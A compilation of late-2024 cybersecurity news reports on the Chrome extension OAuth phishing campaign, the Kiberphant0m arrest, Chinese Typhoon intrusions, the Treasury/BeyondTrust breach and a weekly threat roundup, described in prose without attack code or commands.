New details have emerged about a phishing campaign targeting Chrome browser extension developers that led to the compromise of at least thirty-five extensions to inject data-stealing code, including those from cybersecurity firm Cyberhaven.

Although initial reports focused on Cyberhaven’s security-focused extension, subsequent investigations revealed that the same code had been injected into at least 35 extensions collectively used by roughly 2,600,000 people.

From reports on LinkedIn and Google Groups from targeted developers, the latest campaign started around December 5th, 2024. However, earlier command and control subdomains found by BleepingComputer existed as far back as March 2024.

“I just wanted to alert people to a more sophisticated phishing email than usual that we got that stated a Chrome Extension policy violation of the form: ‘Unnecessary details in the description’,” reads the post to Google Group’s Chromium Extension’s group.

“The link in this email looks like the webstore but goes to a phishing website that will try to take control of your chrome extension and likely update it with malware.”

A deceptive OAuth attack chain

The attack begins with a phishing email sent to Chrome extension developers directly or through a support email associated with their domain name.

From emails seen by BleepingComputer, the following domains were used in this campaign to send the phishing emails:

supportchromestore.com
forextensions.com
chromeforextension.com

The phishing email, which is made to appear as if it comes from Google, claims that the extension is in violation of Chrome Web Store policies and is at risk of being removed.  

“We do not allow extensions with misleading, poorly formatted, non-descriptive, irrelevant, excessive, or inappropriate metadata, including but not limited to the extension description, developer name, title, icon, screenshots, and promotional images,” reads the phishing email.

Specifically, the extension’s developer is led to believe their software’s description contains misleading information and must agree to the Chrome Web Store policies.

If the developer clicks on the embedded ‘Go To Policy’ button in an effort to understand what rules they have violated, they are taken to a legitimate login page on Google’s domain for a malicious OAuth application.

The page is part of Google’s standard authorization flow, designed for securely granting permissions to third-party apps to access specific Google account resources.

On that platform, the attacker hosted a malicious OAuth application named “Privacy Policy Extension” that asked the victim to grant permission to manage Chrome Web Store extensions through their account.

“When you allow this access, Privacy Policy Extension will be able to: See, edit, update, or publish your Chrome Web Store extensions, themes, apps, and licenses you have access to,” reads the OAuth authorization page.

Multi-factor authentication didn’t help protect the account as direct approvals in OAuth authorization flows aren’t required, and the process assumes the user fully understands the scope of permissions they’re granting.

“The employee followed the standard flow and inadvertently authorized this malicious third-party application,” explains Cyberhaven in a post-mortem writeup.

“The employee had Google Advanced Protection enabled and had MFA covering his account. The employee did not receive an MFA prompt. The employee’s Google credentials were not compromised.”

Once the threat actors gained access to the extension developer’s account, they modified the extension to include two malicious files, namely ‘worker.js’ and ‘content.js,’ which contained code to steal data from Facebook accounts.

The hijacked extension was then published as a “new” version on the Chrome Web Store.

While Extension Total is tracking thirty-five extensions impacted by this phishing campaign, IOCs from the attack indicate that a far greater number were targeted.

According to VirusTotal, the threat actors pre-registered domains for targeted extensions, even if they did not fall for the attack.

While most domains were created in November and December, BleepingComputer found that the threat actors were testing this attack in March 2024.

Targeting Facebook business accounts

Analysis of compromised machines showed that the attackers were after the Facebook accounts of users of the poisoned extensions.

Specifically, the data-stealing code attempted to grab the user’s Facebook ID, access token, account info, ad account information, and business accounts.

Additionally, the malicious code added a mouse click event listener specifically for the victim’s interactions on Facebook.com, looking for QR code images related to the platform’s two-factor authentication or CAPTCHA mechanisms.

This aimed to bypass 2FA protections on the Facebook account and allow the threat actors to hijack it.

The stolen information would be packaged together with Facebook cookies, the user agent string, Facebook ID, and the mouse click events and exfiltrated to the attacker’s command and control (C2) server.

Threat actors have been targeting Facebook business accounts via various attack pathways to make direct payments from the victim’s credit to their account, run disinformation or phishing campaigns on the social media platform, or monetize their access by selling it to others.

Dec 31, 2024Ravie LakshmananData Security / Privacy

The U.S. Department of Justice (DoJ) has issued a final rule carrying out Executive Order (EO) 14117, which prevents mass transfer of citizens’ personal data to countries of concern such as China (including Hong Kong and Macau), Cuba, Iran, North Korea, Russia, and Venezuela.

“This final rule is a crucial step forward in addressing the extraordinary national security threat posed of our adversaries exploiting Americans’ most sensitive personal data,” said Assistant Attorney General Matthew G. Olsen of the Justice Department’s National Security Division.

“This powerful new national-security program is designed to ensure that Americans’ personal data is no longer permitted to be sold to hostile foreign powers, whether through outright purchase or other means of commercial access.”

Back in February 2024, U.S. President Joe Biden signed an executive order to address the national risk posed by unauthorized access to Americans’ sensitive personal and government-related data for malicious activities, such as espionage, influence, kinetic, or cyber operations.

Furthermore, the order noted that the countries of concern can leverage their access to bulk data to develop or refine artificial intelligence and other advanced technologies, as well as purchase such information from commercial data brokers and other companies.

“Countries of concern and covered persons can also exploit this data to collect information on activists, academics, journalists, dissidents, political opponents, or members of nongovernmental organizations or marginalized communities to intimidate them; curb political opposition; limit freedoms of expression, peaceful assembly, or association; or enable other forms of suppression of civil liberties,” the DoJ said.

The rule issued by the DoJ is expected to become effective in 90 days. It identifies certain classes of prohibited, restricted, and exempt transactions; sets bulk thresholds for triggering the rule’s prohibitions and restrictions on covered data transactions involving bulk sensitive personal data; and establishes enforcement mechanisms such as civil and criminal penalties.

This covers data spanning six categories: personal identifiers (e.g., Social Security numbers, driver’s license etc.), precise geolocation data, biometric identifiers, human ‘omic (genomic, epigenomic, proteomic, and transcriptomic) data, personal health data, and personal financial data.

However, it bears noting that the rule neither imposes data localization requirements, nor does it prohibit U.S. citizens from conducting medical, scientific, or other research in countries of concern.

“The final rule also does not broadly prohibit U.S. persons from engaging in commercial transactions, including exchanging financial and other data as part of the sale of commercial goods and services with countries of concern or covered persons, or impose measures aimed at a broader decoupling of the substantial consumer, economic, scientific, and trade relationships that the United States has with other countries,” the DoJ said.

Federal authorities have arrested and indicted a 20-year-old U.S. Army soldier on suspicion of being Kiberphant0m, a cybercriminal who has been selling and leaking sensitive customer call records stolen earlier this year from AT&T and Verizon. As first reported by KrebsOnSecurity last month, the accused is a communications specialist who was recently stationed in South Korea.

One of several selfies on the Facebook page of Cameron Wagenius.

Cameron John Wagenius was arrested near the Army base in Fort Hood, Texas on Dec. 20, after being indicted on two criminal counts of unlawful transfer of confidential phone records.

The sparse, two-page indictment (PDF) doesn’t reference specific victims or hacking activity, nor does it include any personal details about the accused. But a conversation with Wagenius’ mother — Minnesota native Alicia Roen — filled in the gaps.

Roen said that prior to her son’s arrest he’d acknowledged being associated with Connor Riley Moucka, a.k.a. “Judische,” a prolific cybercriminal from Canada who was arrested in late October for stealing data from and extorting dozens of companies that stored data at the cloud service Snowflake.

In an interview with KrebsOnSecurity, Judische said he had no interest in selling the data he’d stolen from Snowflake customers and telecom providers, and that he preferred to outsource that to Kiberphant0m and others. Meanwhile, Kiberphant0m claimed in posts on Telegram that he was responsible for hacking into at least 15 telecommunications firms, including AT&T and Verizon.

On November 26, KrebsOnSecurity published a story that followed a trail of clues left behind by Kiberphantom indicating he was a U.S. Army soldier stationed in South Korea.

An 18-year-old Cameron Wagenius, joining the U.S. Army.

Ms. Roen said Cameron worked on radio signals and network communications at an Army base in South Korea for the past two years, returning to the United States periodically. She said Cameron was always good with computers, but that she had no idea he might have been involved in criminal hacking.

“I never was aware he was into hacking,” Roen said. “It was definitely a shock to me when we found this stuff out.”

Ms. Roen said Cameron joined the Army as soon as he was of age, following in his older brother’s footsteps.

“He and his brother when they were like 6 and 7 years old would ask for MREs from other countries,” she recalled, referring to military-issued “meals ready to eat” food rations. “They both always wanted to be in the Army. I’m not sure where things went wrong.”

Immediately after news broke of Moucka’s arrest, Kiberphant0m posted on the hacker community BreachForums what they claimed were the AT&T call logs for President-elect Donald J. Trump and for Vice President Kamala Harris.

“In the event you do not reach out to us @ATNT all presidential government call logs will be leaked,” Kiberphant0m threatened, signing their post with multiple “#FREEWAIFU” tags. “You don’t think we don’t have plans in the event of an arrest? Think again.”

Kiberphant0m posting what he claimed was a “data schema” stolen from the NSA via AT&T.

On that same day, Kiberphant0m posted what they claimed was the “data schema” from the U.S. National Security Agency.

On Nov. 5, Kiberphant0m offered call logs stolen from Verizon’s push-to-talk (PTT) customers — mainly U.S. government agencies and emergency first responders. On Nov. 9, Kiberphant0m posted a sales thread on BreachForums offering a “SIM-swapping” service targeting Verizon PTT customers. In a SIM-swap, fraudsters use credentials that are phished or stolen from mobile phone company employees to divert a target’s phone calls and text messages to a device they control.

The profile photo on Wagenius’ Facebook page was deleted within hours of my Nov. 26 story identifying Kiberphant0m as a likely U.S. Army soldier. Still, many of his original profile photos remain, including several that show Wagenius in uniform while holding various Army-issued weapons.

Several profile photos visible on the Facebook page of Cameron Wagenius.

November’s story on Kiberphant0m cited his own Telegram messages saying he maintained a large botnet that was used for distributed denial-of-service (DDoS) attacks to knock websites, users and networks offline. In 2023, Kiberphant0m sold remote access credentials for a major U.S. defense contractor.

Allison Nixon, chief research officer at the New York-based cybersecurity firm Unit 221B, helped track down Kiberphant0m’s real life identity. Nixon was among several security researchers who faced harassment and specific threats of violence from Judische and his associates.

“Anonymously extorting the President and VP as a member of the military is a bad idea, but it’s an even worse idea to harass people who specialize in de-anonymizing cybercriminals,” Nixon told KrebsOnSecurity. She said the investigation into Kiberphant0m shows that law enforcement is getting better and faster at going after cybercriminals — especially those who are actually living in the United States.

“Between when we, and an anonymous colleague, found his opsec mistake on November 10th to his last Telegram activity on December 6, law enforcement set the speed record for the fastest turnaround time for an American federal cyber case that I have witnessed in my career,” she said.

Nixon asked to share a message for all the other Kiberphant0ms out there who think they can’t be found and arrested.

“I know that young people involved in cybercrime will read these articles,” Nixon said. “You need to stop doing stupid shit and get a lawyer. Law enforcement wants to put all of you in prison for a long time.”

The indictment against Wagenius was filed in Texas, but the case has been transferred to the U.S. District Court for the Western District of Washington in Seattle.

The Chinese government’s intrusions into America’s telecommunications and other critical infrastructure networks this year appears to signal a shift from cyberspying as usual to prepping for destructive attacks.

The FBI and other US federal agencies rang in 2024 boasting about disrupting a Chinese botnet composed of “hundreds” of outdated routers intent on breaking into US critical infrastructure facilities. Spoiler alert: the botnet is back.

This same government-backed crew also compromised at least one large US city’s emergency services network, and has been conducting reconnaissance and enumeration of “multiple” American electric companies since early 2023.

Soon after these intrusions came to light, the Feds began issuing very public alerts that Volt Typhoon was preparing to “wreak havoc” on American infrastructure and “cause societal chaos” in the US. 

“Volt Typhoon’s choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence gathering operations, and the US authoring agencies assess with high confidence that Volt Typhoon actors are pre-positioning themselves on IT networks to enable lateral movement to OT assets to disrupt functions,” the government agencies warned. 

The public learned later in the year that another Beijing hacking unit, this one called Salt Typhoon, had broken into American telecommunications networks in what one senior US senator called the “worst telecom hack in our nation’s history – by far.”

According to government and infosec sources, the attacks remain ongoing.

“We cannot say with certainty that the adversary has been evicted, because we still don’t know the scope of what they’re doing,” Jeff Greene, CISA’s executive assistant director for cybersecurity, told reporters during a Salt Typhoon briefing in early December.

‘Every org should be put on notice’

“Every organization should look at this as being put on notice that there are hostile nation state entities,” CrowdStrike Senior VP of Counter Adversary Operations Adam Meyers told The Register. “If you are involved in any degree of business that ties into the broader international ecosystem, or you’re providing services that are of logistical importance for critical infrastructure, you’re in the line of fire.” 

CrowdStrike tracks 63 different China-linked groups, and about two dozen of these are currently active, according to Meyers. In November, Meyers testified before a Senate committee on how the cyberthreats from the Middle Kingdom have evolved over the past two decades. 

Prior to 2015, these tended to be “smash-and-grab” raids, he said, noting that over the years, they have become more targeted intrusions that focus on high-value individuals and information: sources of political and military secrets, and intellectual property that can advance China’s national interests.

Even more worrisome is that at least one of these state-sponsored groups, Volt Typhoon, which CrowdStrike tracks as “Vanguard Panda,” appears to be pre-positioning deep inside American critical infrastructure networks so it’s ready for disruptive or destructive attacks preceding or coinciding with military activities.

“The reason that Vanguard Panda attracted so much attention was that it was the first time that there was a demonstrable aspect of pre-positioning,” Meyers said during an interview. “This would be like if the Russians, back in the ’60s, thought they were  going to invade the United States. Their pre-positioning would be to hide caches of weapons and resources that they could access as they mounted their invasion across the US.”

This would be like if the Russians, back in the ’60s, were  going to invade. Their pre-positioning would be to hide caches of weapons they could access as they mounted their invasion across the US

Plus, it’s unlikely that blowing up the botnet earlier this year did anything to disrupt the larger organization, or its future plans, he added.

“Disrupting that did not impact Vanguard Panda,” Meyers said. “It did not impact their ability to access the targets that they had gained access to and were continuing to maintain persistence.”

He said he’s doubtful that Volt Typhoon/Vanguard Panda was even running the botnet infrastructure. “That was likely another group that was tasked with providing communications infrastructure, and when that got disrupted, you would have to expect that there would have been a secondary path that would have been on standby,” Meyers noted. “They’re not going to just leave things to chance. If there’s a primary mechanism that they’re using, then they want a secondary and a tertiary one.” 

Before implanting the KV botnet malware on routers and other devices, Volt Typhoon has to break in, which usually involved exploiting bugs in firewalls, VPN appliances, and web servers, or abusing misconfigurations or weak – sometimes non-existent – passwords in these products.

Volt Typhoon’s post-exploitation activity

Tenable last month published a list of some of the CVEs that the crew has exploited in the past to gain initial access. These include a vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software that allows a remote, unauthenticated attacker to upload a file to any location on the filesystem (CVE-2021-27860), a critical authentication bypass flaw in Zoho ManageEngine ADSelfService Plus (CVE-2021-40539), two critical heap-based buffer overflow bugs in Fortinet FortiOS and FortiProxy (CVE-2022-42475 and CVE-2023-27997) and a file upload flaw in Versa Director SD-WAN (CVE-2024-39717). 

Lumen Technologies’ Black Lotus Labs in August warned that Volt Typhoon was abusing the Versa vulnerability CVE-2024-39717 to plant custom, credential-harvesting web shells on customers’ networks and noted that these attacks are “likely ongoing” against unpatched systems.

“What’s unique about Volt Typhoon is the post-exploitation activity,” Tenable research engineer Scott Caveza told The Register. It doesn’t use custom malware, which can be more easily spotted by antivirus software, but instead uses legitimate software products and credentials to snoop around and avoid detection. 

These include Windows tools (cmd.exe, netsh, and PowerShell) for command execution and lateral movement, Mimikatz to extract credentials from memory, Remote Desktop Protocol (RDP) to burrow deeper into internal systems, and Windows Task Scheduler to establish scheduled tasks for regular, persistent access.

“Just executing normal commands and binaries that would be found on a Windows system to do reconnaissance, and further their way through the network,” Caveza said. “It’s very stealth activity, and really speaks to the skill this group has at evading security software suites and making the traffic look seemingly normal.”

In addition to Volt Typhoon and some of the other Chinese government groups using stealthy, so-called “living-off-the-land” techniques, another noteworthy aspect of their ongoing operations targeting critical industries is the US government’s very loud response to the attacks. 

Caught in the cookie jar

Not only did the FBI, CISA, and other government agencies sound the alarm on the Chinese intruders, but they also published a threat hunting guide and listed actions to mitigate Volt Typhoon activity, including patching internet-facing systems, using phishing-resistant multi-factor authentication, and ditching outdated gear that is no longer supported by the manufacturer.

“Number one, kudos to our government,” ZeroFox VP of Intelligence Adam Darrah told The Register. “I do applaud the United States government for being more bold in publicizing these campaigns and saying here’s how to prevent this being an issue. It’s a way to crowdsource national defense.”

While every major intelligence agency in the world spies on adversarial – and sometimes even friendly – government, China’s cyberoperations this year should be a “wake-up call” to people, Darrah added. 

“China has historically been very careful and good about not getting publicly caught with their hand in the American military cookie jar,” he said. “So what was interesting to me: Number one they got caught. Number two: it was publicized. And number three: I’m happy to see this, because it’s time to stop pretending China is this peaceful country that only wants to steal our IP for economic and trade reasons. That’s not true.”

Rafe Pilling, director of threat intelligence for the Secureworks counter threat unit, also highlighted the US government’s efforts to encourage people to mitigate the threat posed by Volt Typhoon. And now only “the threat that has been posed today” with the targeted reconnaissance and espionage activities, “but perhaps more about the threat posed in the future – the wider, unknown activity that might be out there.”

“This includes the pre-positioning warnings and readying for future attacks.”

Piling’s team covers the gamut of threat groups, from financially motivated cybercrime organizations to nation-state attackers, and China “consistently tops our list of state sponsored actors,” he told The Register.

The first cases that Securworks now attributes to Volt Typhoon (it tracks this crew as Bronze Silhouette) occurred in June and September 2021.

But at the time, “we had a number of incidents we responded to for customers involving that threat group that we just had a question mark over,” Piling said. “They didn’t fall into any of the other buckets we tracked, so we out a question mark, ‘China?’ over those incidents.”

It was only years later, after information sharing efforts with public and private researchers, “that you see there is this wider set of activities targeting organizations in mainland United States all the way out to telcos in Guam,” he added. 

But even back in 2021, “the activity we saw certainly looked like access-type operations,” Piling said. “Once you get past the access stage, you can achieve a number of intents, everything from espionage to pre-positioning for disruptive operations. And they’re not mutually exclusive.”

While security and incident response firms get called in after an attack has occurred, the defenders on the front lines are those working in the water, electric grid, oil and gas, and other critical sectors.

Front-line defenders

These are among operational technology (OT) security Xona Systems’ customers, and the consensus is: “There’s a lot more that could be done to protect critical infrastructure,” COO Bill Cantrell told The Register. “The overriding theme is that there’s just not enough funding.”

The biggest concern among critical infrastructure owners and operators continues to be physical safety and reliability. “Those things have always been at the forefront in this industry, Cantrell said. “There’s a lot of very dangerous, high-power equipment and so it’s making sure it’s reliable, it’s safe, and there are good backup procedures.”

These are very real concerns. Critical systems providing drinking water or heat can’t fail without potential life-and-death consequences, and shutting down these systems to update or patch security flaws introduces a raft of physical-world risks.

Over the last several years, however, there have been added concerns around network connectivity and remote access as more OT and IoT devices and systems become connected to the internet. 

“It’s a new vector of pressure that has been put on these OT folks,” Cantrell said. “It’s a world where the OT guys don’t understand the networking and cyber issues, and the IT guys don’t really understand all of the constraints around safety and reliability that go along with these OT networks.”

The most important thing that critical industries should be doing is to modernize secure access to remote infrastructure, according to Cantrell. “That’s where most of these breaches come from is through stolen credentials, VPNs, older jump boxes,” he said, adding that visibility is another key piece. “Half the time, they don’t even know everything that is on the network.”

And it’s a lot to deal with for an org using legacy OT gear and trying to get up to speed on IT concepts like zero-trust access while facing down attempted attacks from ransomware crews and nation-states on a daily basis. 

“The scary thing is that some of these threats may be laying in wait and dormant right now,” Cantrell said. “They may be doing some intel collection and possibly laying in wait to trigger actions when they feel it’s necessary.”

He echoed CISA and the FBI’s alerts of late about it being incredibly hard to kick intruders off of critical networks when you don’t know they are there in the first place. “Some of them may be compromised, and they may not even know it.” ®

The Department of Treasury was notified earlier this month that several of its workstations were hacked by a group believed to be linked to China, the department confirmed to CyberScoop.

According to a letter sent Monday to leaders on the Senate Committee on Banking, Housing and Urban Affairs and obtained by CyberScoop, the compromises occurred through third-party software provider BeyondTrust, which provides identity and access management security solutions.

Treasury officials were notified by BeyondTrust on Dec. 8 that “a threat actor had gained access to a key used by the vendor to secure a cloud-based service used to remotely provide technical support for Treasury Departmental Offices end users,” the letter states.

“With access to the stolen key, the threat actor was able to override the service’s security, remotely access certain Treasury DO user workstations, and access certain unclassified documents maintained by those users,” wrote Aditi Hardikar, Treasury’s assistant secretary for management.

In a statement sent to CyberScoop, a BeyondTrust spokesperson said the company first noticed anomalous activity on Dec. 2 and confirmed on Dec. 5 affecting a “limited” number of remote support SaaS customers. The company said it posted an advisory about the incident on Dec. 8, and the timeline indicates that all identified instances were patched as of of Dec. 16.

“No other BeyondTrust products were involved. Law enforcement was notified and BeyondTrust has been supporting the investigative efforts,” the statement said.

Hardikar wrote that the hacks are being classified as a “major incident” under the Federal Information Security and Modernization Act, and the department has been working with the Cybersecurity and Infrastructure Security Agency, the FBI, intelligence agencies, and third-party forensic investigators to scope out the full impact.

“Based on available indicators, the incident has been attributed to a China state-sponsored Advanced Persistent Threat actor,” Hardikar wrote.

In response to questions, a Treasury spokesperson said the threat actor was able to remotely access “several” Treasury user workstations as well as “certain unclassified documents” maintained by those users. The unnamed BeyondTrust service was taken offline and the department believes the actor no longer has access to Treasury systems or information.

News of the hacks was first reported by Barron’s and Agency France-Presse.

The incident comes as Washington policymakers are still reeling from a wide-ranging compromise of U.S. telecommunications infrastructure by Salt Typhoon, a hacking group linked to the Chinese government. Those compromises gave Beijing broad access to the phones and communications of high-ranking U.S. officials, including reportedly, incoming President-elect Donald Trump and Vice President-elect JD Vance.

This week, the White House said that while fewer than 100 individuals are believed to have been directly impacted by the Salt Typhoon intrusions, a larger group centered around Washington D.C. may have had their geolocation data stolen, something that could potentially allow Chinese intelligence agencies to identify the phones of additional targets.

UPDATE: This story was updated on Dec. 30 to include a statement from a BeyondTrust spokesperson.

The US Department of the Treasury alerted lawmakers on Monday that Chinese state-backed threat actors were able compromise its systems and steal data from workstations earlier this month.

Because an advanced persistent threat (APT) group is suspected to be behind the hack, it is being treated as a “major cybersecurity incident,” the disclosure letter from the US Department of Treasury said, which was sent to the chairman and ranking member of the Senate committee which oversees the agency.

It explained the adversaries broke into Treasury through a third-party cybersecurity vendor, BeyondTrust, and “…gained access to a remote key used by the vendor to secure a cloud-based service used to remotely provide technical support for Treasury Departmental Offices (DO) end users,” the letter said. “With access to the stolen key, the threat actor was able to override the service’s security, remotely access certain Treasury DO user workstations, and access certain unclassified documents maintained by those users.”

The BeyondTrust website said the company has more than 20,000 customers across more than 100 countries who use its privileged remote access tools. The site adds BeyondTrust is used among 75% of Fortune 100 organizations. The company has not responded to Dark Reading’s request for comment.

Treasury added it was told by BeyondTrust about the issue on Dec. 8 and, along with the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI are investigating the compromise, according to the letter.

A BeyondTrust advisory said the company was alerted on Dec. 5 to a compromised API key, which was immediately revoked. Impacted customers have already been notified and the company is working with them on remediation, according to a statement from a BeyondTrust spokesperson.

“BeyondTrust previously identified and took measures to address a security incident in early December 2024 that involved the Remote Support product,” the statement said. “No other BeyondTrust products were involved.”

‘Epic’ Chinese Hack of US Treasury

The revelation that Beijing was able to strike right at the heart of America’s federal capitalist system itself comes as the federal government is still grappling with the sprawling and coordinated Chinese-backed cyberattacks against telecommunications companies in the US. Once inside, hackers from groups including Salt Typhoon accessed call data and text messages of an unknown number of Americans. So far, Chinese hacking groups have been discovered inside at least nine different telecom networks in the US.

While investigations into the US Treasury breach are ongoing, these brazen Chinese acts of cyber espionage are almost to certain to require dicey diplomatic maneuvering. That could prove to be difficult to pull off during the murky transition period from the Biden administration to the incoming Trump administration.

“Beijing’s routine denial of responsibility for cyberespionage incidents raises diplomatic challenges with the US in addressing such breaches effectively since there’s lack of transparency and accountability/coordination,” Lawrence Pingree, vice president of Dispersive said in a statement provided to Dark Reading.

He added that it’s still unclear whether the Chinese hackers were able to crack the application’s secrets, or a cryptographic key.

“Secrets and cryptographic key management are critical elements of managing software API access and thus if deficient in some way, or a compromise occurs via a developer’s endpoint, the breach of those secrets and authentication keys can create these types of epic breaches,” he added.

The breach also shows that cybersecurity vendors remain a favorite targets of sophisticated state threat actors, according to former NSA cyber expert Evan Dornbush, who provided a statement in reaction to the breach.

“The cybersecurity world is reeling from yet another high-profile breach, this time targeting the clients of security vendor BeyondTrust,” Dornbush said. “This incident joins a growing list of attacks on security firms, including Okta (whose breach directly impacted BeyondTrust as a customer), LastPass, SolarWinds, and Snowflake.”

Chinese state-sponsored threat actors hacked the U.S. Treasury Department after breaching a remote support platform used by the federal agency.

In a letter sent to lawmakers and seen by the New York Times, the Treasury Department warned lawmakers it was first notified of the breach on December 8th by its vendor BeyondTrust.

BeyondTrust is a privileged access management company that also offers a remote support SaaS platform that can be used to access computers remotely.

“Based on available indicators, the incident has been attributed to a China state-sponsored Advanced Persistent Threat (APT) actor,” reads the letter seen by the New York Times.

“In accordance with Treasury policy, intrusions attributable to an APT are considered a major cybersecurity incident.”

Earlier this month, BleepingComputer reported that BeyondTrust had been breached, with threat actors gaining access to some of the company’s Remote Support SaaS instances.

As part of this breach, the threat actors utilized a stolen Remote Support SaaS API key to reset passwords for local application accounts and gain further privileged access to the systems.

After investigating the attack, BeyondTrust discovered two zero-day vulnerabilities,  CVE-2024-12356 and CVE-2024-12686, that allowed threat actors to breach and take over Remote Support SaaS instances.

As the Treasury Department was a customer of one of these compromised instances, the threat actors were able to use the platform to access agency computers and steal documents remotely.

After BeyondTrust detected the breach, they shut down all compromised instances and revoked the stolen API key.

The letter says that the FBI and CISA assisted in the investigation into the Treasury Department breach, and there is no evidence that the Chinese threat actors still have access to the agency’s computers now that the compromised instances were shut down.

Chinese state-sponsored threat actors named “Salt Typhoon” have also been linked to recent hacks of nine U.S. telecommunication companies, including Verizon, AT&T, Lument, and T-Mobile. The threat actors are believed to have breached telecom firms in dozens of other countries.

The threat actors utilized this access to target the text messages, voicemails, and phone calls of targeted individuals, and to access wiretap information of those under investigation by law enforcement.

Since this wave of telecom breaches, CISA has urged senior government officials to switch to end-to-end encrypted messaging apps like Signal to reduce communication interception risks.

The U.S. government reportedly plans to ban China Telecom’s last active U.S. operations in response to the telecom hacks.

BleepingComputer sent further questions to the State Department about the breach but has not received a reply yet.

Dec 30, 2025Ravie LakshmananCybersecurity / Hacking News

Every week, the digital world faces new challenges and changes. Hackers are always finding new ways to breach systems, while defenders work hard to keep our data safe. Whether it’s a hidden flaw in popular software or a clever new attack method, staying informed is key to protecting yourself and your organization.

In this week’s update, we’ll cover the most important developments in cybersecurity. From the latest threats to effective defenses, we’ve got you covered with clear and straightforward insights. Let’s dive in and keep your digital world secure.

⚡ Threat of the Week

Palo Alto Networks PAN-OS Flaw Under Attack — Palo Alto Networks has disclosed a high-severity flaw impacting PAN-OS software that could cause a denial-of-service (DoS) condition on susceptible devices by sending a specially crafted DNS packet. The vulnerability (CVE-2024-3393, CVSS score: 8.7) only affects firewalls that have the DNS Security logging enabled. The company said it’s aware of “customers experiencing this denial-of-service (DoS) when their firewall blocks malicious DNS packets that trigger this issue.”

🔔 Top News

• Contagious Interview Drops OtterCookie Malware — North Korean threat actors behind the ongoing Contagious Interview campaign have been observed dropping a new JavaScript malware called OtterCookie. The malware, likely introduced in September 2024, is designed to establish communications with a command-and-control (C2) server using the Socket.IO JavaScript library, and awaits further instructions. It’s designed to run shell commands that facilitate data theft, including files, clipboard content, and cryptocurrency wallet keys.
• Cloud Atlas Continues its Assault on Russia — Cloud Atlas, a hacking of unknown origin that has extensively targeted Russia and Belarus, has been observed using a previously undocumented malware called VBCloud as part of its cyber attack campaigns targeting “several dozen users” in 2024. The attacks employ phishing emails containing Microsoft Word documents, which, when opened, trigger an exploit for a seven-year-old security flaw to deliver the malware. VBCloud is capable of harvesting files matching several extensions and information about the system. More than 80% of the targets were located in Russia. A lesser number of victims have been recorded in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam.
• Malicious Python Packages Exfiltrate Sensitive Data — Two malicious Python packages, named zebo and cometlogger, have been found to incorporate features to exfiltrate a wide range of sensitive information from compromised hosts. Both the packages were downloaded 118 and 164 times each, before they were taken down. A majority of these downloads came from the United States, China, Russia, and India.
• TraderTraitor Behind DMM Bitcoin Crypto Heist — Japanese and U.S. authorities officially blamed a North Korean threat cluster codenamed TraderTraitor (aka Jade Sleet, UNC4899, and Slow Pisces) for the theft of cryptocurrency worth $308 million from cryptocurrency company DMM Bitcoin in May 2024. The attack is notable for the fact that the adversary first compromised the system of an employee of Japan-based cryptocurrency wallet software company named Ginco under the pretext of a pre-employment test. “In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack,” authorities said.
• WhatsApp Scores Legal Victory Against NSO Group — NSO Group has been found liable in the United States after a federal judge in the state of California ruled in favor of WhatsApp, calling out the Israeli commercial spyware vendor for exploiting a security vulnerability in the messaging app to deliver Pegasus using WhatsApp’s servers 43 times in May 2019. The targeted attacks deployed the spyware on 1,400 devices globally by making use of a then zero-day vulnerability in the app’s voice calling feature (CVE-2019-3568, CVSS score: 9.8).

‎️‍🔥 Trending CVEs

Heads up! Some popular software has serious security flaws, so make sure to update now to stay safe. The list includes — CVE-2024-56337 (Apache Tomcat), CVE-2024-45387 (Apache Traffic Control), CVE-2024-43441 (Apache HugeGraph-Server), CVE-2024-52046 (Apache MINA), CVE-2024-12856 (Four-Faith routers), CVE-2024-47547, CVE-2024-48874, and CVE-2024-52324 (Ruijie Networks)

📰 Around the Cyber World

• ScreenConnect Used to Deploy AsyncRAT — Microsoft has revealed that cybercriminals are leveraging tech support scams to deploy AsyncRAT through the remote monitoring and management (RMM) software ScreenConnect, the first time that ScreenConnect is used to deploy malware, instead of as a persistence or lateral movement tool. The company also said threat actors are using SEO poisoning and typosquatting to deploy SectopRAT, an infostealer used to target browser information and crypto wallets. The disclosure comes as Malwarebytes disclosed that criminals are employing decoy landing pages, also called “white pages,” that utilize AI-generated content and are propagated via bogus Google search ads. The scam involves attackers buying Google Search ads and using AI to create harmless pages with unique content. The goal is to use these decoy ads to then lure visitors to phishing sites for stealing credentials and other sensitive data. Malvertising lures have also been used to distribute SocGholish malware by disguising the page as an HR portal for a legitimate company named Kaiser Permanente.
• AT&T, Verizon Acknowledge Salt Typhoon Attacks — U.S. telecom giants AT&T and Verizon acknowledged that they had been hit by the China-linked Salt Typhoon hacking group, a month after T-Mobile made a similar disclosure. Both the companies said they don’t detect any malicious activity at this point, and that the attacks singled out a “small number of individuals of foreign intelligence interest.” The breaches occurred in large part due to the affected companies failing to implement rudimentary cybersecurity measures, the White House said. The exact scope of the attack campaign still remains unclear, although the U.S. government revealed that a ninth telecom company in the country was also a target of what now appears to be a sprawling hacking operation aimed at U.S. critical infrastructure. Its name was not disclosed. China has denied any involvement in the attacks.
• Pro-Russian Hacker Group Targets Italian Websites — Around ten official websites in Italy were targeted by a pro-Russian hacker group named Noname057(16). The group claimed responsibility for the distributed denial-of-service (DDoS) attacks on Telegram, stating Italy’s “Russophobes get a well deserved cyber response.” Back in July, three members of the group were arrested for alleged cyber attacks against Spain and other NATO countries. Noname057(16) is one of the many hacktivist groups that have emerged in response to the ongoing conflicts in Ukraine and the Middle East, with groups aligned on both sides engaging in disruptive attacks to achieve social or political goals. Some of these groups are also state-sponsored, posing a significant threat to cybersecurity and national security. According to a recent analysis by cybersecurity company Trellix, it’s suspected that there’s some kind of an operational relationship between Noname057(16) and CyberArmyofRussia_Reborn, another Russian-aligned hacktivist group active since 2022. “The group has created alliances with many other hacktivist groups to support their efforts with the DDoS attacks,” Trellix said. “However, the fact that one of the previous CARR administrators, ‘MotherOfBears,’ has joined NoName057(16), the continuous forwarding of CARR posts, and previous statements, suggest that both groups seem to collaborate closely, which can also indicate a cooperation with Sandworm Team.”
